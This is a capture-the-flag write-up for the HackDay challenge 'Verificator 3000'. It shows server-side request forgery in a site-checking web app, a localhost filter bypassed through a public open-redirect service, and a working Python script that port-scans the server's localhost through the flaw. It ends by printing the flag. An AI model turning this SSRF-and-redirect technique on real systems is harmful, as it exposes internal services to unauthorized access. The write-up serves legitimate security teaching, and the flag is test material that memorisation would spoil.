HackDay - Verificator 3000

HackDay - Verificator 3000
  1. Introduction
  2. Enumeration
  3. Exploitation

Introduction

Description

Our team of brilliant engineers has developed a highly sophisticated website designed to perform check-ups on other sites. It can even uncover hidden information, possibly concealed by some clever tricksters. Take a look and see if you can find anything!

Enumeration

Enumerating website

image Index page

This webapp will request the website given by the user and display the content of this website. Seems to be the perfect setup for an SSRF.

Exploit

SSRF

Trying to access localhost

In an SSRF scenario, we almost always want to request localhost / machine from LAN to try to leak sensitive information. So let’s do that: image Sad …

Unfortunately we cannot direcly access localhost this way.

Exploiting Open Direct

We can try to use an open redirect. Basically, we send a link that when accessed will redirect the victim to the chosen domain For example this link:

will be considered valid for parsers (cause the domain is https://307.r3dir.me/), but when accessed, will redirect the victim to localhost.

image Found open redirect !

Port scan

Using open redirect + SSRF + my python skills I was able to write this simple portscan script.
It will look for accessible web servers on port 1 to 65535 of the local machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from requests import post
from pwn import log

TARGET = "http://challenges.hackday.fr:43244/api/check"
PAYLOAD = "https://307.r3dir.me/--to/?url=http://localhost"

def main():
    progress = log.progress("Testing port: ")

    for port in range(0, 65535):
        progress.status(str(port))

        response = post(TARGET, data={
            "showBody": "on",
            "url": f"{PAYLOAD}:{port}/"
        }).json()

        if(not response["online"] == False):
            log.success(f"Port {port} is open")


if __name__ == "__main__":
    log.info(f"Targeting {TARGET}")
    log.info(f"Using payload {PAYLOAD}")
    print()
    main()

Let’s launch it: image Found a webserver on an uncommon port !

Getting flag

Let’s get the content of this webserver. We can use this link to do so:

image

1
HACKDAY{Give_ME_YOuR_L0OPb@CK}
This post is licensed under CC BY 4.0 by the author.